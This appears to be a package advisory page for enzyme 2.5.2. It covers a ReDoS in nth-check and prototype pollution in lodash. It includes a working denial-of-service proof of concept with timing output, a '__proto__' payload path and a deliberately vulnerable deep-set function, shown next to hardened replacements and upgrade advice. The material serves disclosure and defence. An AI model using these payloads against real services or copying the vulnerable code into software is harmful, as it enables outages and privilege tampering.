Enzyme version 2.5.2 introduces small but potentially impactful changes compared to its predecessor, 2.5.1, focused on utility and developer experience. Both versions are JavaScript testing utilities for React that help developers write robust and reliable tests for their React components. One key difference lies in the dependencies: version 2.5.2 adds "function.prototype.name", "object.entries" and "object.values", along with "uuid" and "in-publish", as dependencies. The first three are polyfill-style packages, which suggests a focus on broader JavaScript environment support and more consistent handling of object properties for developers working with diverse React setups.
Both versions provide a rich set of tools for traversing and manipulating React component output, simulating user interactions, and making assertions about component behavior. Developers can use Enzyme to write unit and integration tests for their React components. With a peer dependency on React versions ranging from 0.13.x to 15.x, both 2.5.1 and 2.5.2 aim for broad compatibility. Upgrading from 2.5.1 to 2.5.2 therefore means assessing the impact of the new dependencies and whether they fit your project's existing toolchain; every added dependency also widens the transitive dependency tree that your audit tooling has to cover. Consider these dependency updates carefully when choosing between versions for your test suite.
All vulnerabilities related to version 2.5.2 of the package (both are in transitive dependencies rather than in enzyme's own code; run `npm ls nth-check lodash` in your project to see the path through which each one is pulled in)
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check versions before 2.0.1 (CVE-2021-3803) that causes a denial of service when parsing crafted invalid CSS nth-checks. nth-check reaches enzyme 2.5.2 through cheerio's CSS selector support.
The ReDoS is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))?: the outer \s* and the inner \s* are adjacent quantified expressions that can both consume the same run of whitespace, so when the input ends in a character that neither \d+ nor end-of-input accepts, the engine retries every possible split of the whitespace run before failing. This can be exploited with the following code.
Proof of Concept
// PoC.js
// Each iteration builds "2n", a run of i*10000 spaces and a trailing "!".
// The "!" is not trimmed and matches neither \d+ nor end-of-input, so every
// parse fails and the regex engine backtracks through the whole space run.
var nthCheck = require("nth-check");

// Note: the bound of 50000 makes the loop effectively unbounded; at i = 5 a
// single parse already takes seconds (see the output below).
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = "2n" + " ".repeat(i * 10000) + "!";
  try {
    nthCheck.parse(attack_str);
  } catch (err) {
    // parse() throws for invalid formulas; the time spent before the throw
    // is the cost of the backtracking.
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}
The output (the cost grows superlinearly with the length of the whitespace run)
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
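The following is an added example, not code from nth-check, enzyme or the advisory. VULNERABLE_NTH_RE is a stand-in pattern built around the sub-pattern quoted above, and parseLinear is an assumed hand-written replacement that recognises the same an+b grammar without a backtracking regex; neither is copied from nth-check. Both parsers return [a, b] for a valid formula and null for an invalid one, so the two can be compared on the same inputs, including the attack string from the PoC.

```javascript
// Added example (not nth-check's code). The regex below is a stand-in that
// contains the advisory's sub-pattern; parseLinear is an assumed replacement.
// Outer \s* followed by an optional group that starts with another \s*: the
// two quantifiers can split a run of spaces in O(n) ways, and a trailing
// character that neither \d+ nor $ accepts forces the engine to try them all.
const VULNERABLE_NTH_RE = /^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$/;

function parseWithRegex(formula) {
  const s = formula.trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];
  const m = VULNERABLE_NTH_RE.exec(s);
  if (!m) return null;
  let a = 0;
  if (m[1]) {
    const digits = m[1].slice(0, -1); // strip the trailing "n"
    a = digits === "" || digits === "+" ? 1 : digits === "-" ? -1 : parseInt(digits, 10);
  }
  const b = m[3] ? parseInt((m[2] || "") + m[3], 10) : 0;
  return [a, b];
}

// Same grammar, scanned left to right with a cursor that only moves forward
// (one bounded rewind when the optional "an" term is absent). Runtime is
// proportional to the input length regardless of how the input ends.
function parseLinear(formula) {
  const s = formula.trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];
  const n = s.length;
  const isDigit = (c) => c >= "0" && c <= "9";
  const isSpace = (c) => c === " " || c === "\t" || c === "\n" || c === "\r" || c === "\f" || c === "\v";
  let i = 0;
  const skipWs = () => { while (i < n && isSpace(s[i])) i++; };
  const readSign = () => (s[i] === "+" || s[i] === "-" ? s[i++] : "+");
  const readDigits = () => { const start = i; while (i < n && isDigit(s[i])) i++; return s.slice(start, i); };

  // Optional "an" term: sign? digits* "n"
  let a = 0;
  const save = i;
  const sign1 = readSign();
  const d1 = readDigits();
  if (s[i] === "n") {
    a = d1 === "" ? 1 : parseInt(d1, 10);
    if (sign1 === "-") a = -a;
    i++;
  } else {
    i = save; // no n-term; the characters belong to the constant term
  }
  skipWs();
  // Optional "b" term: sign? whitespace* digits+
  let b = 0;
  if (i < n) {
    const sign2 = readSign();
    skipWs();
    const d2 = readDigits();
    if (d2 === "") return null; // sign or garbage with no digits
    b = parseInt(d2, 10);
    if (sign2 === "-") b = -b;
  }
  return i === n ? [a, b] : null; // anything left over (e.g. "!") is invalid
}

function timeMs(fn, input) {
  const t0 = Date.now();
  fn(input);
  return Date.now() - t0;
}

// Constructed attack inputs in the shape used by the PoC, kept small so the
// regex path finishes in well under a second.
for (const spaces of [1000, 2000, 4000]) {
  const attack = "2n" + " ".repeat(spaces) + "!";
  console.log(`${attack.length} chars: regex ${timeMs(parseWithRegex, attack)} ms, linear ${timeMs(parseLinear, attack)} ms`);
}
```

Upgrading nth-check to 2.0.1 or later is the real fix; where an upgrade is blocked, a length cap on selector strings before they reach the parser limits the damage, since the cost is a function of the whitespace run the attacker controls.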
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution (CVE-2020-8203). The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays, for example passing a request-controlled path such as "__proto__.isAdmin" to set.
This vulnerability causes the addition or modification of a property that will then exist on all objects, and may lead to Denial of Service or Code Execution under specific circumstances (for instance when the polluted property is later read by a template engine or by code that branches on a property's presence).
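The following is an added example, not lodash's code and not copied from the fix in 4.17.19. vulnerableSet is a minimal deep-set in the style of set(object, path, value) that walks whatever the path names, including inherited properties, and safeSet is an assumed hardened variant that rejects the prototype-reaching keys and only descends into own properties. runPollutionCheck is a constructed harness that attacks a fresh object, observes whether an unrelated object gained the property, and then removes the property again so the process is left clean.

```javascript
// Added example (not lodash's code). The "Set" functions below are simplified
// stand-ins for set(object, path, value); the names and the harness are assumed.
const isObjectLike = (v) => v !== null && (typeof v === "object" || typeof v === "function");

function toKeys(path) {
  return Array.isArray(path) ? path.map(String) : String(path).split(".");
}

// Vulnerable shape: every segment is looked up with plain property access, so
// "__proto__" resolves to Object.prototype and "constructor.prototype" does too.
function vulnerableSet(target, path, value) {
  const keys = toKeys(path);
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    if (!isObjectLike(cur[k])) cur[k] = {};
    cur = cur[k];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Hardened shape: refuse the keys that can reach a prototype, and never walk
// into an inherited property, only into the target's own data.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function safeSet(target, path, value) {
  const keys = toKeys(path);
  for (const k of keys) {
    if (FORBIDDEN_KEYS.has(k)) throw new Error("unsafe key in path: " + k);
  }
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    if (!Object.prototype.hasOwnProperty.call(cur, k) || !isObjectLike(cur[k])) {
      cur[k] = {};
    }
    cur = cur[k];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Constructed harness: attack a fresh object through a prototype-reaching
// prefix, then check whether an object that was never touched inherits the
// property. The probe is deleted afterwards to undo any pollution.
function runPollutionCheck(setFn, attackPrefix) {
  const probe = "__pp_probe__";
  let threw = false;
  try {
    setFn({}, attackPrefix + "." + probe, "owned");
  } catch (e) {
    threw = true;
  }
  const victim = {};
  const leaked = victim[probe] === "owned";
  delete Object.prototype[probe];
  return { threw, leaked };
}

for (const prefix of ["__proto__", "constructor.prototype"]) {
  console.log(prefix, "vulnerableSet:", runPollutionCheck(vulnerableSet, prefix));
  console.log(prefix, "safeSet:", runPollutionCheck(safeSet, prefix));
}
console.log("safeSet on a normal path:", JSON.stringify(safeSet({}, "a.b.c", 1)));
```

The own-property check matters as much as the deny-list: without it a path such as "toString.x" descends into the shared Object.prototype.toString function and writes there, which is the same class of bug under a key the deny-list does not name.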